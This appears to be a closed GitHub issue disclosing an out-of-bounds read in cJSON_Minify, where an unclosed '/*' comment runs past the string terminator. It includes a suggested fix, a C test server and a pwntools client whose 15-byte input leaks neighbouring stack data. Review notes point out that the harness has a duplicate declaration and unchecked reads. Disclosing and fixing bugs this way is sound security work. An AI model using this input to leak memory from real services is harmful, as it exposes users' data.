Closed
https://github.com/DaveGamble/cJSON/blob/master/cJSON.c : 2669
This bug can skip past the terminating \x00 and read and write across the buffer boundary; if str* APIs are then used on the result they will fault or cause logic problems such as stack/heap overflow, information leaks, etc.
else if ((*json == '/') && (json[1] == '*'))
{
/* multiline comments. */
while (*json && !((*json == '*') && (json[1] == '/')))
{
json++;
}
json += 2;
}This should instead be coded as below:
else if ((*json == '/') && (json[1] == '*'))
{
/* multiline comments. */
while (*json && !((*json == '*') && (json[1] == '/')))
{
json++;
}
if(!(*json))
{
/* break or return */
}
json += 2;
}For the test, this just leaks stack data:
server.c
/*
 * Minimal TCP reproducer for the cJSON_Minify issue described above:
 * accepts one client, reads into a 16-byte stack buffer and minifies that
 * buffer in place, printing it before and after.  `leakdata1` is placed
 * next to `buf` so an over-read past buf's terminator shows up in the output.
 */
int main(int argc, const char* argv[]) {
/* NOTE(review): socket()/bind()/listen()/accept() results are never checked;
 * on failure the later calls simply operate on -1. */
int lfd = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in serv_addr;
memset(&serv_addr, 0, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(880);
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
bind(lfd, (struct sockaddr*)&serv_addr, sizeof(serv_addr));
listen(lfd, 64);
struct sockaddr_in clien_addr;
socklen_t clien_len = sizeof(clien_addr);
int cfd = accept(lfd, (struct sockaddr*)&clien_addr, &clien_len);
char ipbuf[128];
printf("client iP: %s, port: %d\n", inet_ntop(AF_INET, &clien_addr.sin_addr.s_addr, ipbuf, sizeof(ipbuf)),
ntohs(clien_addr.sin_port));
/* NOTE(review): `leakdata1` is declared twice in this scope (here and two
 * lines below); that is a redefinition error, so one of the two declarations
 * has to be removed before this harness compiles. */
char leakdata1[16] = "passwordpassword";
/* 16 bytes, zero-filled: a 15-byte message leaves buf[15] as the NUL terminator. */
char buf[16] = {0};
char leakdata1[16] = "passwordpassword";
memset(buf, 0, 16);
/* NOTE(review): this loop has no exit, so the close() calls below are unreachable. */
while(1) {
/* NOTE(review): `len` is never checked.  read() returning 0 (peer closed) or
 * -1 keeps looping on the stale buffer, and a full 16-byte read leaves buf
 * without a NUL terminator, so the %s printf and cJSON_Minify below would run
 * off the end regardless of the cJSON bug.  Reading sizeof(buf) - 1 and
 * setting buf[len] = '\0' after a positive return is the usual fix. */
int len = read(cfd, buf, sizeof(buf));
printf("recv bufdata = %s\n", buf);
/* In-place minify.  Per the snippet above, an unterminated "/*" makes the
 * multiline-comment loop stop at the NUL and `json += 2` then continues past
 * the end of buf, which is what the output below demonstrates. */
cJSON_Minify(buf);
printf("After cJSON_Minify, bufdata:\n%s\n", buf);
}
close(cfd);
close(lfd);
return 0;
}client just send data(15bytes, not buf overflow) as below,
# pwntools (third-party) client for the server above; written for Python 2 (raw_input).
from pwn import *
p = remote('127.0.0.1', 880)
# 15 bytes: an opening "/*" with no closing "*/", which still fits in the
# server's 16-byte buf together with its NUL terminator.
p.send('/*abcdefghjklmn')
# Blocks here so the connection stays open while the server's output is inspected.
raw_input('waiting...')
output:
client iP: 127.0.0.1, prot: 39284
recv bufdata = /*abcdefghjklmn
After cJSON_Minify, bufdata:
asswordpassword127.0.0.1